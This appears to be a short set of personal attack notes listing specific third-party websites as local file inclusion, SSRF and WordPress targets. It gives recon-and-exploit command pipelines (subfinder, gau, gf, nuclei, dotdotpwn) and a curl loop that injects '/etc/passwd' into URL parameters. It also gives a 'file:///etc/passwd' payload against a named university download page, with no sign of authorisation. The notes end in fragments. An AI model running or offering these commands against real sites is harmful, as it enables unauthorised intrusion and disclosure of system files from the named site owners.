lfi_vulnerble_targets
subfinder -d ravagedband.com | httpx-toolkit | gau | uro | gf lfi | tee ravagedband.txt
nuclei -list ravagedband.txt -tags lfi
echo 'https://arc.iram.fr/' | gau | uro | gf lfi
nuclei -target 'https://arc.iram.fr/home.php?page=about.php' -tags lfi
http://lars-seeberg.com
nuclei -target 'http://lars-seeberg.com ' -tags lfi
https://mylocal.life/index.php?page=contact.php
nuclei -target 'https://mylocal.life/index.php?page=contact.php' -tags lfi
dotdotpwn -m http-url -d 10 -f /etc/passwd -u "https://mylocal.life/index.php/pandora_console/ajax.php?page=TRAVERSAL" -b -k "root:"
subfinder -d mylocal.life | httpx-toolkit | gau | uro | gf lfi | qsreplace "/etc/passwd" | while read url ; do curl -silent "$url" | grep "root:x" && echo "$url is vulnerable" ; done;
echo 'http://santosranch.com/?page=contact.php' | qsreplace "/etc/passwd" | while read url ; do curl -silent "$url" | grep "root:x" && echo "$url is vulnerable" ; done;
nuclei -target 'http://santosranch.com/?page=contact.php' -tags lfi
echo "https://sksc.somaiya.edu" | waybackurls | gf redirect
https://sksc.somaiya.edu/download.php?pdf_path=https%3A%2F%2Fdharma-studies.s3.ap-south-1.amazonaws.com%2FCSJ-Syllabi%2F28_CSJ_M.A.%2BJainology%2Band%2BPrakrit_July%2BAC_260820.pdf
https://sksc.somaiya.edu/download.php?pdf_path=file:///etc/passwd
SSRF bypass By DNS rebinding
USING FOLLOWING LINK
Vuln wordpresss site
https://thefutureafrica.com/
Last updated